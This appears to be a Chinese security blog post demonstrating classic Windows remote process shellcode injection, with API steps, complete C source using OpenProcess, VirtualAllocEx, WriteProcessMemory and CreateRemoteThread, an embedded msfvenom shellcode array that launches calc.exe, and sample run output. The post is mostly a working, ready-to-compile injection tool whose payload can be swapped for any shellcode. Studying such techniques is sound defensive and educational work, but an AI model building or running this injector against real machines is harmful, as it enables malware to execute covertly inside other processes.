Code Injection Demo

Code Injection Demo

Function

  • OpenProcess
  • VirtualAllocEx
  • WriteProcessMemory
  • CreateRemoteThread

Process

  • 使用 OpenProcess 函数获取对进程的访问权限
  • 使用 VirtualAllocEx 函数在远程进程空间中分配一块内存
  • 使用 WriteProcessMemory 函数将 shellcode 复制到分配的内存中
  • 使用 CreateRemoteThread 函数在远程进程中创建一个线程,并传入第二步分配到的内存(shellcode)

1
2
3
4
5
(PWSTR)VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)

WriteProcessMemory(hProcess, remote_buffer, shellcode, sizeof(shellcode), NULL)

CreateRemoteThread(hProcess, NULL, 0, remote_buffer, NULL, 0, NULL)

demo

codeinjection.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#include <Windows.h>
#include <tchar.h>


BOOL ShellCodeRemoteInjection(DWORD PID)
{
    // msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -b "\x00" -f c -v shellcode
    unsigned char shellcode[] =
        "\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d\x05\xef\xff"
        "\xff\xff\x48\xbb\x0f\xd2\x5c\x69\xeb\xc9\xe0\xaa\x48\x31\x58"
        "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xf3\x9a\xdf\x8d\x1b\x21"
        "\x20\xaa\x0f\xd2\x1d\x38\xaa\x99\xb2\xfb\x59\x9a\x6d\xbb\x8e"
        "\x81\x6b\xf8\x6f\x9a\xd7\x3b\xf3\x81\x6b\xf8\x2f\x9a\xd7\x1b"
        "\xbb\x81\xef\x1d\x45\x98\x11\x58\x22\x81\xd1\x6a\xa3\xee\x3d"
        "\x15\xe9\xe5\xc0\xeb\xce\x1b\x51\x28\xea\x08\x02\x47\x5d\x93"
        "\x0d\x21\x60\x9b\xc0\x21\x4d\xee\x14\x68\x3b\x42\x60\x22\x0f"
        "\xd2\x5c\x21\x6e\x09\x94\xcd\x47\xd3\x8c\x39\x60\x81\xf8\xee"
        "\x84\x92\x7c\x20\xea\x19\x03\xfc\x47\x2d\x95\x28\x60\xfd\x68"
        "\xe2\x0e\x04\x11\x58\x22\x81\xd1\x6a\xa3\x93\x9d\xa0\xe6\x88"
        "\xe1\x6b\x37\x32\x29\x98\xa7\xca\xac\x8e\x07\x97\x65\xb8\x9e"
        "\x11\xb8\xee\x84\x92\x78\x20\xea\x19\x86\xeb\x84\xde\x14\x2d"
        "\x60\x89\xfc\xe3\x0e\x02\x1d\xe2\xef\x41\xa8\xab\xdf\x93\x04"
        "\x28\xb3\x97\xb9\xf0\x4e\x8a\x1d\x30\xaa\x93\xa8\x29\xe3\xf2"
        "\x1d\x3b\x14\x29\xb8\xeb\x56\x88\x14\xe2\xf9\x20\xb7\x55\xf0"
        "\x2d\x01\x21\x51\xc8\xe0\xaa\x0f\xd2\x5c\x69\xeb\x81\x6d\x27"
        "\x0e\xd3\x5c\x69\xaa\x73\xd1\x21\x60\x55\xa3\xbc\x50\x29\xfd"
        "\x80\x05\x93\xe6\xcf\x7e\x74\x7d\x55\xda\x9a\xdf\xad\xc3\xf5"
        "\xe6\xd6\x05\x52\xa7\x89\x9e\xcc\x5b\xed\x1c\xa0\x33\x03\xeb"
        "\x90\xa1\x23\xd5\x2d\x89\x0a\x8a\xa5\x83\x84\x6a\xaa\x39\x69"
        "\xeb\xc9\xe0\xaa";

	BOOL status         = FALSE;
	HANDLE hProcess     = NULL, hThread = NULL;
	PWSTR remote_buffer = NULL;

    __try
    {
        hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
        _tprintf(L"Injecting DLL to PID: %lu \n", PID);
        if (hProcess == INVALID_HANDLE_VALUE)
        {
            _tprintf(L"Get Process Handle Error : %lu\n", GetLastError());
            __leave;
        }

        remote_buffer = (PWSTR)VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        if (!remote_buffer)
        {
            _tprintf(L"VirtualAlloc Error %lu \n", GetLastError());
            __leave;
        }

        if (!WriteProcessMemory(hProcess, remote_buffer, shellcode, sizeof(shellcode), NULL))
        {
            _tprintf(L"WriteProcessMemory Error %lu \n", GetLastError());
            __leave;
        }

        hThread = CreateRemoteThread(hProcess, NULL, 0, remote_buffer, NULL, 0, NULL);
        if (hThread == NULL)
        {
            _tprintf(L"CreateRemoteThread Error %lu \n", GetLastError());
            __leave;
        }

        WaitForSingleObject(hThread, INFINITE);
        status = TRUE;
    }
    __finally
    {
        if (remote_buffer != NULL)
            VirtualFreeEx(hProcess, remote_buffer, 0, MEM_RELEASE);
        if (hThread != NULL)
            CloseHandle(hThread);
        if (hProcess != NULL)
            CloseHandle(hProcess);
    }
    return(status);
}

int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
    if (argc != 2)
    {
        _tprintf(L"Usage: %s <pid> \n", argv[0]);
        return(1);
    }
    if (ShellCodeRemoteInjection((DWORD)_tstol(argv[1])))
    {
        _tprintf(L"Shellcode Injection Sucess \n");
    }
    else
    {
        _tprintf(L"Shellcode Injection Fail \n");
    }
    return(0);
}

运行

1
2
3
remote_shellcode_injection.exe 8044
# Injecting DLL to PID: 8044
# Shellcode Injection Sucess

Sucess


信息安全
code injection

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!